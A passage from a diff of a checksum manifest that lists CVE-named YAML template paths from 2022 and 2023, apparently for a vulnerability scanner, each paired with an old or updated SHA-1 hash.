+http/cves/2022/CVE-2022-32022.yaml:045182910398007e7aba1b8b88eccf6766f7d6e4 +http/cves/2022/CVE-2022-32024.yaml:259dacf55e74f0b1c55b269de7e762e8d6d45005 +http/cves/2022/CVE-2022-32025.yaml:c3a8842ce0fbb7e6436cbf02258e88749c677580 +http/cves/2022/CVE-2022-32026.yaml:f22acd38cad0db3a84a9da1f23b3991594f1722d +http/cves/2022/CVE-2022-32028.yaml:01bdd0f506e66e6764d933042140175737c3e4f8 +http/cves/2022/CVE-2022-32094.yaml:27fc637584c0df88213cb283a1f87f4ed20ed6d7 +http/cves/2022/CVE-2022-32195.yaml:addebbdee50fa35f58e5886b2b7e66f2829cf105 +http/cves/2022/CVE-2022-32409.yaml:f0d4f4581a6b6a395be850252a285b0d47b79461 +http/cves/2022/CVE-2022-3242.yaml:687470d05099c173a34569594797cc87747e36d3 +http/cves/2022/CVE-2022-32429.yaml:2560e0f1a9ba677e66f2cc7a70b8975a7df68a9b +http/cves/2022/CVE-2022-32444.yaml:4b282b2f2c637e4fc70744320366e6d932d9bde7 +http/cves/2022/CVE-2022-32770.yaml:1e54d7ff9fb5356521ad2ad1e6e1614c86a15475 http/cves/2022/CVE-2022-32771.yaml:8c7613e41192dbe20c22fb53e7b9be0e654e06fd http/cves/2022/CVE-2022-32772.yaml:0ce8c54ce25f55d44920214e4dab29936c7debbe -http/cves/2022/CVE-2022-33119.yaml:210b7124097983ca0174abfd8e5373c446961822 -http/cves/2022/CVE-2022-33174.yaml:8d6f9f79b4754bf2f126e2834bb0bd5ed9bc894b +http/cves/2022/CVE-2022-33119.yaml:c5e85b5aee7ce2174a92af2ef10a79c0cdcc56fe +http/cves/2022/CVE-2022-33174.yaml:2898b3f7088408352e58a6ce9684db15334c3535 http/cves/2022/CVE-2022-33891.yaml:4cdc6f7d0fa2a47f4ffc0de6bedd2d65697918e9 -http/cves/2022/CVE-2022-33901.yaml:c40a51c12c885ad4b2cec26c48f6a1af38c32026 -http/cves/2022/CVE-2022-33965.yaml:e7af66b09050b589fcf8ac5951d07680f1533dd0 -http/cves/2022/CVE-2022-34045.yaml:cf46786b0e4546994f2e028693c8204a31b18902 -http/cves/2022/CVE-2022-34046.yaml:db28204352680dbffac98b055185a468f5337e45 -http/cves/2022/CVE-2022-34047.yaml:5d2537c47b7cd9609b74d3c8601be8c7e142421d -http/cves/2022/CVE-2022-34048.yaml:d5a74f46077af404abd83a0844c909a278a175e4 -http/cves/2022/CVE-2022-34049.yaml:3b013a0f4bf2df866ba7027283a3a545b1981b83 -http/cves/2022/CVE-2022-34093.yaml:28cd9110f2ef6a7342b5fe925230e84772563f3f -http/cves/2022/CVE-2022-34094.yaml:869ecda83e3f1681a9c0e3d129fa126f4712c960 -http/cves/2022/CVE-2022-34121.yaml:e742546980cc507791b5a5261fb3db4aa02c25ef -http/cves/2022/CVE-2022-34328.yaml:bdae84168a062f748d1b1fa48a6285785c9d8297 -http/cves/2022/CVE-2022-34576.yaml:23731c2b3176dc7a0693bc35ab8aecd1002fa4c9 -http/cves/2022/CVE-2022-34590.yaml:7608adfd899437a2b54b00da0a559a223e3d1eae +http/cves/2022/CVE-2022-33901.yaml:cca4e13b78d3af1f4732d238a65e258a04b86419 +http/cves/2022/CVE-2022-33965.yaml:b118754d2923f0337dd277607826535d7206d85a +http/cves/2022/CVE-2022-34045.yaml:751db41367e6d59d1ac2cf855f335077b2867a13 +http/cves/2022/CVE-2022-34046.yaml:3ee24c5800fd1b44e249bcbb7025930c8d0f7fe1 +http/cves/2022/CVE-2022-34047.yaml:d8e9a747391291a0632771b25de1b7e3f7e49b7b +http/cves/2022/CVE-2022-34048.yaml:e58c403d7e0abd8f2aa9d81d70745812b55b630f +http/cves/2022/CVE-2022-34049.yaml:53d6881cabbfe0ae6fae2d353e852247543ae718 +http/cves/2022/CVE-2022-34093.yaml:4a2841511d69cbace93f523a57630d053d707112 +http/cves/2022/CVE-2022-34094.yaml:e32ed1cdf3cf87c85651dde92535787964fbb99c +http/cves/2022/CVE-2022-34121.yaml:c0b842722b1cc1898849400903e47877043f5981 +http/cves/2022/CVE-2022-34328.yaml:8689c58821f263864e780e3a83f6ada6c973984e +http/cves/2022/CVE-2022-34576.yaml:58cff109315976e35a1547747e407d4c41618232 +http/cves/2022/CVE-2022-34590.yaml:2c0e12939c402905cfb486d49310623165a7d35e http/cves/2022/CVE-2022-34753.yaml:6e119e2278f2c73b1b04a6fbdcc89b1298930e5d -http/cves/2022/CVE-2022-3484.yaml:72886c0ce125d0121b9ec39c1c065c53a2a916c9 -http/cves/2022/CVE-2022-3506.yaml:b18b01955317401ced901d0b7f576501e0a82a86 -http/cves/2022/CVE-2022-35151.yaml:9e3d2a3086ca4c51f946fcfca62e84ff6107a67c -http/cves/2022/CVE-2022-35405.yaml:babc40871ef75ffee136676b10b6dd4156e9523b -http/cves/2022/CVE-2022-35413.yaml:06c7a16cbc05e130a302baf283f4188accbfb3cc -http/cves/2022/CVE-2022-35416.yaml:f3d5d6cdb3390d09fdd8929540c8f3c960f1ac9a -http/cves/2022/CVE-2022-35493.yaml:37476da8fac43f6a472fc8ce6efb0e393050c4cc -http/cves/2022/CVE-2022-3578.yaml:55a79ee72af59a34e909dca5d3455be0e7e86d6d +http/cves/2022/CVE-2022-3484.yaml:03a930cfa06847895d074c6ebc674b43531b8f43 +http/cves/2022/CVE-2022-3506.yaml:97bf178ab32a6c12a039bea217897afb052db4d1 +http/cves/2022/CVE-2022-35151.yaml:8f9d694300d1edf4f6a90fb2a7b132ce8fee4da1 +http/cves/2022/CVE-2022-35405.yaml:25f2b54eb20964150f894872c7824fb9b46e58b8 +http/cves/2022/CVE-2022-35413.yaml:6a79051c4816f97039aabd49fde638eca157db68 +http/cves/2022/CVE-2022-35416.yaml:4f9276f5b443bf95cb804647fe86971433c70346 +http/cves/2022/CVE-2022-35493.yaml:41701ca3d42bf0d092de4fceb4aae7df612355f3 +http/cves/2022/CVE-2022-3578.yaml:aa51ea9ceaec66c265764c27fce329e735958ed0 http/cves/2022/CVE-2022-35914.yaml:988d48cf28cf5c521a03c9e06417ee6c0173c174 http/cves/2022/CVE-2022-36446.yaml:3ba76d221c6ea11834811b6d7e1351508e3804d7 -http/cves/2022/CVE-2022-36537.yaml:67567ecb0d5fcd708155505c43cda30a658c24e5 -http/cves/2022/CVE-2022-36553.yaml:4e9416caf1e91d343e28b357fc072c21b6395dbc -http/cves/2022/CVE-2022-36642.yaml:cf92a939ff546c103425309e0ed5f1dd6b08d390 -http/cves/2022/CVE-2022-36804.yaml:d8bae83b022c4dfd4bbed90231b6adde94e71c4a -http/cves/2022/CVE-2022-36883.yaml:ca00242121aba0025ab692d039039d29be562da5 -http/cves/2022/CVE-2022-37042.yaml:52a1e7123ebbce21d35541c936b37109c475c50c -http/cves/2022/CVE-2022-37153.yaml:094e406bc4bd14fa6600a99805e1d1f578d676a8 -http/cves/2022/CVE-2022-37190.yaml:6459c91625c14546618133dfc447ca9b9f97f886 -http/cves/2022/CVE-2022-37191.yaml:b08de51f3c6a1ff3efc9adabbc80bc06dd972b47 -http/cves/2022/CVE-2022-37299.yaml:bcc743ac3a8534aff4cf5c13ba5668b65689e2cb -http/cves/2022/CVE-2022-3768.yaml:2bef04c3a3495777e6c2815ad38b296fc0247def -http/cves/2022/CVE-2022-3800.yaml:66d724f7eb058bd00c41b46ef18206384a51d810 -http/cves/2022/CVE-2022-38295.yaml:855fd3acaca96d7ed3b385c98d774517b65f8b19 -http/cves/2022/CVE-2022-38296.yaml:1f28561526352737ae2bfb2d495b654d511f8f84 -http/cves/2022/CVE-2022-38463.yaml:b249323de8df9a2afbcd1841e72890405811829c -http/cves/2022/CVE-2022-38467.yaml:75e1226be3af7e55f8f4a81507e2804d904ef8ae -http/cves/2022/CVE-2022-38553.yaml:c69595447c8554fb97fa3e9b92e8061d59b6b6a9 -http/cves/2022/CVE-2022-38637.yaml:0165214e0721f97cfe32d2af7920284e36e63050 -http/cves/2022/CVE-2022-38794.yaml:aeba619e1d186cbf8dc30422cea21ae5a7b47f5c -http/cves/2022/CVE-2022-38817.yaml:acc4ef0990e7fdd7926550f697fac137d739c771 -http/cves/2022/CVE-2022-38870.yaml:bf980061e67886458acbadfc1d77a59ee9e39c0d -http/cves/2022/CVE-2022-39048.yaml:41aa51a1f94aefc1fc26d81ec8dcf7ac7aa575f5 -http/cves/2022/CVE-2022-3908.yaml:1c82b8eeff31ef53f7f7a2d718cc609cd3de2aff -http/cves/2022/CVE-2022-39195.yaml:376490467e1579751b75a4be9945da32390118b3 -http/cves/2022/CVE-2022-3933.yaml:a07749aa20b24542a226e215e0cf44f9671777ee -http/cves/2022/CVE-2022-3934.yaml:8cac4655d66abf31f59d08f0416a2a969ea4dc9b -http/cves/2022/CVE-2022-3980.yaml:f92ecd623bae505f035c7f9d982a618f6cdba4e3 -http/cves/2022/CVE-2022-3982.yaml:1e6d7cb41177297f084d5ebeb54e6838bfede3c6 -http/cves/2022/CVE-2022-39952.yaml:f69dd95bbbbadca0e0a3cba5825b32392d48e865 -http/cves/2022/CVE-2022-39960.yaml:302c12429ab15151feb5189cd66e812694e45428 -http/cves/2022/CVE-2022-39986.yaml:7fad1537c4d40e2dd95fd96020e159bde46cc072 -http/cves/2022/CVE-2022-40022.yaml:c04e0dd2dba374003c7280992a0fbb04a7a0ea9e -http/cves/2022/CVE-2022-40032.yaml:952e56f1e63cae0e66571b9227597b3baacb6aee -http/cves/2022/CVE-2022-40047.yaml:4bb7bc696bed5f6c5869dd6706399ac6c4d47b4e -http/cves/2022/CVE-2022-40083.yaml:6e55bb06e2390d87351d4fbf4bc6db97a0ebfeb6 -http/cves/2022/CVE-2022-40127.yaml:c3805f16dd4e729a02a2c9741b77c304fcb147b2 -http/cves/2022/CVE-2022-40359.yaml:f3e18999a88592ac103c16f3d14b5516a9e2dbcd -http/cves/2022/CVE-2022-4049.yaml:130a074f8e63caaf8e9fdaef18b59113be3463d8 -http/cves/2022/CVE-2022-4050.yaml:499b8608c4dd7fa62d94619039aeb756620b2317 -http/cves/2022/CVE-2022-4057.yaml:a44dcab4ce8fb89dafea11908e67e7f6cc9d40af -http/cves/2022/CVE-2022-4059.yaml:c2487bb3463b66fb4df0bb7e8dc92b0eddc0adfb -http/cves/2022/CVE-2022-4060.yaml:06a657e46dcc155859980c414c3a7f12d7f5efac -http/cves/2022/CVE-2022-4063.yaml:9488000323299cbb9cee07a10d158f2c31de2e1a +http/cves/2022/CVE-2022-36537.yaml:78ff5c4146d209775bd65566652caf2e3725639b +http/cves/2022/CVE-2022-36553.yaml:8c0181ea0aa6a58a96386dd4138d30743d9459b5 +http/cves/2022/CVE-2022-36642.yaml:1d8f12885014eb1817bfdca02439abe061ffc8ce +http/cves/2022/CVE-2022-36804.yaml:44a5940acc46553e22c1c283682d012e7382d09d +http/cves/2022/CVE-2022-36883.yaml:954db0406078eadd62ecd8399f94df98c9f1b107 +http/cves/2022/CVE-2022-37042.yaml:2a22d293f6c9ace308101bbffc79a9cddf28169e +http/cves/2022/CVE-2022-37153.yaml:21c3be1ec61e7cbafc6bf0e0895e09402b48749b +http/cves/2022/CVE-2022-37190.yaml:3008c94eea3e32b3f3c7224493b41cb323655588 +http/cves/2022/CVE-2022-37191.yaml:9d2c0ad57ac3ccb970b868656fe82e609159c25f +http/cves/2022/CVE-2022-37299.yaml:b04e14b3a9fecda2d02146974362054ed46cc41e +http/cves/2022/CVE-2022-3768.yaml:9d37458dd9e48222d221357808b9c41694fd6e91 +http/cves/2022/CVE-2022-3800.yaml:ebab4cd617c704f521fbbf26764c400ec82b4584 +http/cves/2022/CVE-2022-38295.yaml:002e3378f1047e47917ec8ae8d9cc2ecd2b93b90 +http/cves/2022/CVE-2022-38296.yaml:c12c42a94f9fb3c6338c469d29be225c3b171c56 +http/cves/2022/CVE-2022-38463.yaml:91311b970fe0c11ab253c3a741887f65337b5c78 +http/cves/2022/CVE-2022-38467.yaml:70df500e3ce249232e559daf8e19cd55a38ddb00 +http/cves/2022/CVE-2022-38553.yaml:c8c3c6ddf37489e061d5bda0867df3f68f708ac0 +http/cves/2022/CVE-2022-38637.yaml:5750592db82c3df3765d016013ed1cd2bf672e87 +http/cves/2022/CVE-2022-38794.yaml:b2c1f351dc8e6c841705d627d0326b6f6fa197fd +http/cves/2022/CVE-2022-38817.yaml:af4221d8a5a28708b700b03dd2e8b738950526d2 +http/cves/2022/CVE-2022-38870.yaml:13485a6a250848279087b0dd01b57b2606942acd +http/cves/2022/CVE-2022-39048.yaml:8a26629ce5a3f0ff77780b70b2936c6e13059229 +http/cves/2022/CVE-2022-3908.yaml:d89da30d9494f3e114d9fb1ff95ee3770ab8c86c +http/cves/2022/CVE-2022-39195.yaml:e3bb78f44894ab9c79c92f9b3a8a4c9ee09cab47 +http/cves/2022/CVE-2022-3933.yaml:4c89e0c0710ad79c8034f30cfd90500e64ca2d1f +http/cves/2022/CVE-2022-3934.yaml:61446c88875e18d9bae4e6193a7f354c3fac1f6e +http/cves/2022/CVE-2022-3980.yaml:1a48b47ad19b8a2f3af8ba6cf12edaa5b0230007 +http/cves/2022/CVE-2022-3982.yaml:798258a049fbcec3022e01c8a4ae0e3465bd4a6d +http/cves/2022/CVE-2022-39952.yaml:0b1d1418779a28279c2a9214f6f05eb96b0457dc +http/cves/2022/CVE-2022-39960.yaml:7f1fe6b2391d4be597b89f2c0c742af8e548bda0 +http/cves/2022/CVE-2022-39986.yaml:ca5e61b3ae643e8fcee73b7b4d244f54d12f5805 +http/cves/2022/CVE-2022-40022.yaml:54e9294e6f291293a29d4da5c38f437465796cf6 +http/cves/2022/CVE-2022-40032.yaml:4719865973965c1f1204495f29ea48154e5dd26e +http/cves/2022/CVE-2022-40047.yaml:793afd04f8c9c86910efe6f8d14b91ec4aad4504 +http/cves/2022/CVE-2022-40083.yaml:9ac8b3aa1d9d7c7c200cf1f0d0f1740bc9ec7801 +http/cves/2022/CVE-2022-40127.yaml:319b9ea730a9ffdeb5511daf3ba693e9a0137d1a +http/cves/2022/CVE-2022-40359.yaml:f96b032180f89b18945806d51e3d7701d6b44265 +http/cves/2022/CVE-2022-4049.yaml:9cfb3a97a764908248bd9e8c76e696cf80dbc9a2 +http/cves/2022/CVE-2022-4050.yaml:85761e87eb3b951b76ce79be3bc0dd0e910ac406 +http/cves/2022/CVE-2022-4057.yaml:d5e7686a9040606a74621131cd0c5dcb88ea1266 +http/cves/2022/CVE-2022-4059.yaml:55e194a04872ab67d15e5c23e31d79874bdf8f1c +http/cves/2022/CVE-2022-4060.yaml:b924043b4d3ce46ad2fbabdc9065056b84ef2368 +http/cves/2022/CVE-2022-4063.yaml:98f51093c43d147b905460f27e8fe1ad3fb93be6 http/cves/2022/CVE-2022-40684.yaml:f19b9f392b205d74b85d897dd99d96602f140a2c -http/cves/2022/CVE-2022-40734.yaml:bc460ca809f47a28a4ade60e810c8c27dd88c20f -http/cves/2022/CVE-2022-40843.yaml:dccce628b740aab660687e18c2508daf7d793dc3 -http/cves/2022/CVE-2022-40879.yaml:3f21b19f2a6e96c694ecf9e69ae728484dc698b8 -http/cves/2022/CVE-2022-40881.yaml:079fa811acbb23a36b4cf9ce214aa9ad81727eec -http/cves/2022/CVE-2022-4117.yaml:98d710f773c89beb7a55183f303abc0e53a7e72a -http/cves/2022/CVE-2022-4140.yaml:c43c41778f1b2007ca3c4812e7c8a49435192f34 -http/cves/2022/CVE-2022-41441.yaml:fb4185dc8b567f9feba382f65022294515d881f5 -http/cves/2022/CVE-2022-41473.yaml:3235bfc8a1d18530a1e15fa8768961d4adf65bc1 -http/cves/2022/CVE-2022-41840.yaml:5ad51a4abd737ecf31c8b6d3c11f02dd2c334047 -http/cves/2022/CVE-2022-42094.yaml:e88dc07647dc79316fd538d979fafb401ec2b76e -http/cves/2022/CVE-2022-42095.yaml:dd786fcf318f490e0cc59b200889611ed5e435c3 -http/cves/2022/CVE-2022-42096.yaml:3528e0649abc642746657e5a57249faa3bf3b21b -http/cves/2022/CVE-2022-42233.yaml:21ba612c075f7ea29bc6b23d692bde7378d5e374 -http/cves/2022/CVE-2022-4260.yaml:2dbe1e379f0a0d6282cce6b002e54856c6b65252 -http/cves/2022/CVE-2022-42746.yaml:b2d2710ae0f2773215c616b9b930b1df19c37590 -http/cves/2022/CVE-2022-42747.yaml:2f3101ce42ab7cd6d2c8605d64fd51d6ebd99182 -http/cves/2022/CVE-2022-42748.yaml:24a619d09eec6425ba5acbcb12f532b3976440ae -http/cves/2022/CVE-2022-42749.yaml:def750d86f8944fe4ba4ffb80d99538adc2cbead -http/cves/2022/CVE-2022-4295.yaml:b91ee964bebd0ef86da4e9252529970e81341917 -http/cves/2022/CVE-2022-4301.yaml:26256f398a527e0e0e79b6b723fd02ebb729fb9b -http/cves/2022/CVE-2022-43014.yaml:f75fe0e3d0b38b2ebef28e7860769859b40fd8a4 -http/cves/2022/CVE-2022-43015.yaml:a2725ef25a3987c72eede0e6cf3bf172070ecd85 -http/cves/2022/CVE-2022-43016.yaml:ee59ec70e4d2e3ab586ccc2577aa0b5383417622 -http/cves/2022/CVE-2022-43017.yaml:0cbb9776c82417f515e1ea74c84f43a4a232e80a -http/cves/2022/CVE-2022-43018.yaml:f3d98547001bcdd799734d18dfda570ac5bcd3f8 -http/cves/2022/CVE-2022-4305.yaml:a17bc6d2fd5889b3e9e3910524b71d29b638764f -http/cves/2022/CVE-2022-4306.yaml:dda7b8855613bc52dfc74b86b1273b5ee23e42cc -http/cves/2022/CVE-2022-43140.yaml:f8e1083cf521a67c8c4922b82f1f19e6533ed538 -http/cves/2022/CVE-2022-43164.yaml:b42feaa4ec3e4d42b735e4e251abc969cb6fad90 -http/cves/2022/CVE-2022-43165.yaml:b2916caa56f7f0fc97f5e8349e77dcaed328e815 -http/cves/2022/CVE-2022-43166.yaml:92708ba50df81c42247962d9292cd49e8a13e508 -http/cves/2022/CVE-2022-43167.yaml:cd8cee12551097b7d5e14f4214826649e061cf49 -http/cves/2022/CVE-2022-43169.yaml:7d58bec47795dd66bdb5335b215cec857718369b -http/cves/2022/CVE-2022-43170.yaml:e101e27b2e9dcc0d66e5578b8ed11421e0375f06 -http/cves/2022/CVE-2022-43185.yaml:dae56484093f7a417f8614838f3aac1db7c4de8f -http/cves/2022/CVE-2022-4320.yaml:53a5eae084adc520854497975bdd3b0424bbfda2 -http/cves/2022/CVE-2022-4321.yaml:94733d2b2aa202f1144ccde62f6ff7c000676bd3 -http/cves/2022/CVE-2022-4325.yaml:9c2ee9e83463dc80d28c46680048349f1bf6067a -http/cves/2022/CVE-2022-4328.yaml:13a42ec9837cfe56f3b366e79f5492542d88d4e7 -http/cves/2022/CVE-2022-43769.yaml:7b82c76140c8991dc849a8634ddf45a3778c192f -http/cves/2022/CVE-2022-44290.yaml:4da9e9d3ce98b131cf147fcce598be027dd3d63f -http/cves/2022/CVE-2022-44291.yaml:c29f3746899ac67d405e6da5c6735daac4bafd01 -http/cves/2022/CVE-2022-4447.yaml:cadbc7f256391562feebb99cc28d888c7ca61182 +http/cves/2022/CVE-2022-40734.yaml:39beebc9198471fd2dcaf8d9ef0f9ddfba2204e2 +http/cves/2022/CVE-2022-40843.yaml:f488b9bdc93ba400e9f3a887c2c061231d3041c6 +http/cves/2022/CVE-2022-40879.yaml:18bf6e9df2cd316d4230efa05dec0765123e6cfb +http/cves/2022/CVE-2022-40881.yaml:e8ff93dea2789ce967bad0b75d62ea559f3b20f8 +http/cves/2022/CVE-2022-4117.yaml:94a3d058a4557ecd9b183d0c64f7a597911d4e25 +http/cves/2022/CVE-2022-4140.yaml:c41d6434281cb8970dbeeaff336ddd63eace8662 +http/cves/2022/CVE-2022-41441.yaml:81aecb7e0c3fdaabed8b6191ef472eb0f0007b60 +http/cves/2022/CVE-2022-41473.yaml:9fb7903e742e2eb7f4b23957502344644894ac76 +http/cves/2022/CVE-2022-41840.yaml:e08f0f727e2e910b4a0e1d28769e2def1eaa83a9 +http/cves/2022/CVE-2022-42094.yaml:51cf19c21d4d4b13cd9ba8dc473903757eb29844 +http/cves/2022/CVE-2022-42095.yaml:89400e8ee83a2bf97f5c1a5abbd722984e0a07d1 +http/cves/2022/CVE-2022-42096.yaml:d61bd823ebc4403c9529163870f0fa069b9d8cfe +http/cves/2022/CVE-2022-42233.yaml:47aa5f499439454830e7b5127c9ce0b1e79832ee +http/cves/2022/CVE-2022-4260.yaml:ee29fd7a7608eb26a5b8df2dcb4752740c21d976 +http/cves/2022/CVE-2022-42746.yaml:75c08c7f114a12f6c68699afa32b941b971bbfe3 +http/cves/2022/CVE-2022-42747.yaml:8dd2d823885d541a1c903fddea5c9920885a52d5 +http/cves/2022/CVE-2022-42748.yaml:715df885a21c0415183f357fab8923928a0c8f92 +http/cves/2022/CVE-2022-42749.yaml:70a172bffd561c0f2b3f527bdbc597487822854c +http/cves/2022/CVE-2022-4295.yaml:e5c7cc834dd05709efbdea06864a21ba2ae799e1 +http/cves/2022/CVE-2022-4301.yaml:8918c7b4b842f875e8f0b00eb784df7d32b9f649 +http/cves/2022/CVE-2022-43014.yaml:9cf7652551dea73fb30a5df9b9034f1fb5126b0d +http/cves/2022/CVE-2022-43015.yaml:da53fd3fe51015a89346a0f2d60aaa8f32270d2f +http/cves/2022/CVE-2022-43016.yaml:1b0ad31172a23198c677e59d27434c8e1e8c553d +http/cves/2022/CVE-2022-43017.yaml:7a826e885dd50267efa5674a8cefb6a7e5f272fc +http/cves/2022/CVE-2022-43018.yaml:116b402a27b1b89987fe08ec991982e3badf6220 +http/cves/2022/CVE-2022-4305.yaml:0e95d5958d5cce4ba76e384d8c7d4c08b75aa091 +http/cves/2022/CVE-2022-4306.yaml:f629720988abdfa16b31c59ca119d193e6d6224c +http/cves/2022/CVE-2022-43140.yaml:7271d3b0f2eb8e9233b456e1369a687ba2e6530d +http/cves/2022/CVE-2022-43164.yaml:7501a19ab248d129bad191e99b278f4206023a2a +http/cves/2022/CVE-2022-43165.yaml:850ea0864269b1acad5c9979b37466b94ff7aa68 +http/cves/2022/CVE-2022-43166.yaml:21826784c00cd72f5c358ee16d1cc6d217d2f0cb +http/cves/2022/CVE-2022-43167.yaml:3be2d7d024045029bc64c6acb8b5c110881c3236 +http/cves/2022/CVE-2022-43169.yaml:fa646bbc25acdc11bb8a0d433a78a985e8ca4fd9 +http/cves/2022/CVE-2022-43170.yaml:bb1c1ea9765ef934ace3d165de03c2ebf766af27 +http/cves/2022/CVE-2022-43185.yaml:f7616510c27b4541d306e96061f78b1015bc3d3d +http/cves/2022/CVE-2022-4320.yaml:82a7ef878812d63363a908242580bfea6c9409da +http/cves/2022/CVE-2022-4321.yaml:9d0e02c54a71504825e393f1228df5a9eb43c9fb +http/cves/2022/CVE-2022-4325.yaml:9e71c3bdc68c7d6ca6a27a2d31a85e67f1d5725e +http/cves/2022/CVE-2022-4328.yaml:e971d90931fb62d65e2d4ae5af6299176c15bcc8 +http/cves/2022/CVE-2022-43769.yaml:1969012d0c7d08328c6b1aaefbbda9adce36cf83 +http/cves/2022/CVE-2022-44290.yaml:72fbba96df3dfc35da4d8f3044e528d5e5ff97d1 +http/cves/2022/CVE-2022-44291.yaml:567a801c013289bfeb328f0b1d6e8cfecf429d43 +http/cves/2022/CVE-2022-4447.yaml:d8f926714a7325f096980053f9b4551c6a1962cd http/cves/2022/CVE-2022-44877.yaml:fb837548cd2db206ef66d643efc42fe11dbe0a72 -http/cves/2022/CVE-2022-44944.yaml:07f4181db4c793b86591cdd6177014d002cd5456 -http/cves/2022/CVE-2022-44946.yaml:a6364127e9dcdeb8aeaafeebb206df5a989d9be3 -http/cves/2022/CVE-2022-44947.yaml:df3e8cb35ad1588602f91291e8c31a74322be813 -http/cves/2022/CVE-2022-44948.yaml:2088097035672af97cf08d16fd9636d52577bbbc -http/cves/2022/CVE-2022-44949.yaml:8c73a82b1fdcbe1483a3b44a7b9b8d52431767bc -http/cves/2022/CVE-2022-44950.yaml:cfb20c9a149eb3f7ac1c3f3e01927a422e619926 -http/cves/2022/CVE-2022-44951.yaml:48bdabd6d5e6c4085e107c8fc178be4c83e471c6 -http/cves/2022/CVE-2022-44952.yaml:8582a4737de9df1593abc22fe881a0c3e8e697d0 -http/cves/2022/CVE-2022-44957.yaml:a858a64e001f18bfe73324eeb0bec8b600cfad72 -http/cves/2022/CVE-2022-45037.yaml:98233f4399a882e60f28c6b54833a157a10022eb -http/cves/2022/CVE-2022-45038.yaml:b0ade2f8518bbd0aa9d6829bede11fee8921b160 +http/cves/2022/CVE-2022-44944.yaml:5c64562a165a6792da0c29748616044be9369298 +http/cves/2022/CVE-2022-44946.yaml:ffbefb08c8cba8ffd51eef21c4f54cfb07f147c2 +http/cves/2022/CVE-2022-44947.yaml:ed6a635fb350ae534e69a0da16e9260c2809e8f4 +http/cves/2022/CVE-2022-44948.yaml:3692f4ead174ef7dda069d5a018c04e0757a4642 +http/cves/2022/CVE-2022-44949.yaml:fc6378c71d79ca7cacf13382f5c2f1c21fbe14a9 +http/cves/2022/CVE-2022-44950.yaml:62821d0f501cfc7fedfabc648b0b878d7d3646a6 +http/cves/2022/CVE-2022-44951.yaml:da850f0db910d45f6f8ffb9ae4237acf2b7e926b +http/cves/2022/CVE-2022-44952.yaml:e5c482f58e25c0a0b041339e5a04c01dcdc7c8a3 +http/cves/2022/CVE-2022-44957.yaml:57606d290d01aaabd8411c9a8ef34d72cf3db037 +http/cves/2022/CVE-2022-45037.yaml:4d297b87e50f104f71776abdda0a47f5f544052c +http/cves/2022/CVE-2022-45038.yaml:c590a55d094daceb7b190d00486e24d5dffd8364 http/cves/2022/CVE-2022-45354.yaml:74b3e516dafb8498fc37736a5c504dec4325bca5 http/cves/2022/CVE-2022-45362.yaml:8b38771a9d554ed3e0813063295cc0113aaf3beb http/cves/2022/CVE-2022-45365.yaml:bc6d4127eb5583316f2ee30607f2c57f6a348daa http/cves/2022/CVE-2022-45805.yaml:e48872860059c99910e7872cf33e46beffa1140a http/cves/2022/CVE-2022-45835.yaml:9b8d0fe74bf30733642921c3778b4a3e315c5872 -http/cves/2022/CVE-2022-45917.yaml:b51fc3328f2c84619ff86d49c5384a63850ff13a -http/cves/2022/CVE-2022-45933.yaml:9b6ee3fb0705d8229d525dfdb1ebb33d1880fe2b -http/cves/2022/CVE-2022-46020.yaml:7c4d4961d724f307e7c568ed19a43c10caeae055 -http/cves/2022/CVE-2022-46071.yaml:0b0b93d0992ebc1de9319ece0f144f0385ed8adc -http/cves/2022/CVE-2022-46073.yaml:0eec3bd76660fd5ede35062bc51ac134939fc33c -http/cves/2022/CVE-2022-46169.yaml:9dfe55cd4abdf4b91bc38d47daa85dd801bb8315 -http/cves/2022/CVE-2022-46381.yaml:87c3a319cceee6f4e097c363bc5e64fe814d92db -http/cves/2022/CVE-2022-46443.yaml:111e978310a26a245542949a321e2f3066666ccc -http/cves/2022/CVE-2022-46463.yaml:94d2eef1c4cb94c6a5d0eea0b55bba0a3e8dea1b -http/cves/2022/CVE-2022-46888.yaml:240e335612355647437ea73246668f6efb47e185 -http/cves/2022/CVE-2022-46934.yaml:58681da247f0a18cc11a133e17d30b5e32571335 -http/cves/2022/CVE-2022-47002.yaml:e01f11efaf8a0ee2b5afdabf9a7e2385b26f3510 -http/cves/2022/CVE-2022-47003.yaml:38b2d65f68afab6823ebe1e55f5ae77231576a62 -http/cves/2022/CVE-2022-47075.yaml:c733948d8abdd17bc543b33d181007199ba42527 -http/cves/2022/CVE-2022-47615.yaml:7412f2f3c0b0978820d995eae21bda20f18a5963 -http/cves/2022/CVE-2022-47945.yaml:cb69c9e3fa22b790e98da8f36e0f922d87d733cf -http/cves/2022/CVE-2022-47966.yaml:b98313a7e12358d30d0f473b94def0ac7abadf47 -http/cves/2022/CVE-2022-47986.yaml:80b523d218d2fc59f98ae1c4b2528bf0bd13330f -http/cves/2022/CVE-2022-48012.yaml:13ac37ee71cde65cef6a17efbd992f2a4da6d017 -http/cves/2022/CVE-2022-48165.yaml:2cd235789e7ce0e820d5a69eb19617cb2140d724 -http/cves/2022/CVE-2022-48197.yaml:31997106f1f251dc2e640a2a8477b264dac18f7b -http/cves/2022/CVE-2022-4897.yaml:016a387f9e78dfc8191a9550fff0266251408483 -http/cves/2023/CVE-2023-0099.yaml:91b0a7ca6f80ea7e1cf5dbbe4282e0eb6ea3f9d4 -http/cves/2023/CVE-2023-0126.yaml:0ca13b49ac4181ae7ed201a2a2b9207728c73c57 -http/cves/2023/CVE-2023-0236.yaml:58c16abbff31da07f1d55c4518bfbf9f2cd5ec21 -http/cves/2023/CVE-2023-0261.yaml:a5fdb511390ef54891761ae715e44cee7b945128 +http/cves/2022/CVE-2022-45917.yaml:a9fd1580691e29d7cbbf12512ec860a3b2328962 +http/cves/2022/CVE-2022-45933.yaml:ccd61a4ea6614a77accee1ed8ee849f5cdba5850 +http/cves/2022/CVE-2022-46020.yaml:610df71447cf41bf32f7039d0acd234f9f0529e1 +http/cves/2022/CVE-2022-46071.yaml:f42abd30c0881d4204badf82f8f9f414a5973744 +http/cves/2022/CVE-2022-46073.yaml:da94953650c55ba255629ce7eef4a3a48391ac88 +http/cves/2022/CVE-2022-46169.yaml:f641990bbd27a355bb806ebdc07471c4ec61035d +http/cves/2022/CVE-2022-46381.yaml:a66fe0f94de171aa6fad66091ffdc7b1165fa998 +http/cves/2022/CVE-2022-46443.yaml:42e3d676de6a6fc0895632f0f7c09110a84990ed +http/cves/2022/CVE-2022-46463.yaml:884144d4871d62514f434315b50094a28364d0bd +http/cves/2022/CVE-2022-46888.yaml:61c16fc66c63930ceabd45c2771d6d5e3facdc69 